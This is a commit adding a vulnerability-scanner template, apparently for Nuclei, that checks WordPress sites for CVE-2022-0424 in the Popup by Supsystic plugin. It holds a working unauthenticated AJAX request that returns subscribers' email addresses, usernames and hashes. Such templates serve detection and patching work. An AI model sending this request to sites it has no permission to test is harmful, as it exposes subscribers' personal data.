add cve-2022-0424

patch-1
Kazgangap 2024-04-10 22:54:34 +03:00
parent 98671ddba7
commit ea437826b6
1 changed files with 48 additions and 0 deletions

View File

@ -0,0 +1,48 @@
id: CVE-2022-0424
info:
name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
author: Kazgangap
severity: medium
description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0424
cwe-id: CWE-306
epss-score: 0.00082
epss-percentile: 0.34103
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata:
vendor: supsystic
product: popup
framework: wordpress
tags: wpscan
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
headers:
Content-Length: "104"
Accept: "application/json, text/javascript, */*; q=0.01"
X-Requested-With: "XMLHttpRequest"
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
Accept-Encoding: "gzip, deflate"
Accept-Language: "en-US,en;q=0.9"
Connection: "close"
body: |
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and
matchers:
- type: word
words:
- '"id":"1","username"'
- 'email'
- 'hash'
- type: status
status:
- 200